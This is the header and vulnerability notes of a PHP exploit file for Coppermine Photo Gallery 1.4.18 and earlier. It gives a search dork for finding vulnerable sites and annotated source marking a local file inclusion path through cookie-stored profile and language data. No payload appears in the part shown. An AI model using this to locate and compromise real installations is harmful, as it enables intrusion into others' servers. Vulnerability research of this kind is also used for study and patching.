1 <?php
3 /*
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
Coppermine Photo Gallery <= 1.4.18 LFI / Remote Code Execution Exploit
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://coppermine-gallery.net/
dork.....: "Powered by Coppermine Photo Gallery"
[-] code vulnerable to LFI in /include/init.inc.php
263.
// Start output buffering
264.
ob_start('cpg_filter_page_html');
265.
266.
// Parse cookie stored user profile
267.
user_get_profile(); <==== [1]
268.
269.
// Authenticate
270.
$cpg_udb->authenticate();
[...]
301.
// Process language selection if present in URI or in user profile or try
302.
// autodetection if default charset is utf-8
303.
if (!empty($_GET['lang']))
304.
{
305.
$USER['lang'] = ereg("^[a-z0-9_-]*$", $_GET['lang']) ? $_GET['lang'] : $CONFIG['lang'];
306.
}
307.
308.
if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
309.
{
310.
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
311.
$CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
312.
}
313.
elseif ($CONFIG['charset'] == 'utf-8') <====== [2]
314.
{
315.
include('include/select_lang.inc.php');
316.
if (file_exists('lang/' . $USER['lang'] . '.php'))
317.
{
318.
$CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
319.
$CONFIG['lang'] = $USER['lang'];
320.
}
321.
}
322.
else
323.
{
324.
unset($USER['lang']);
325.
}
326.
327.
if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
328.
{
329.
unset($CONFIG['default_lang']);
330.
}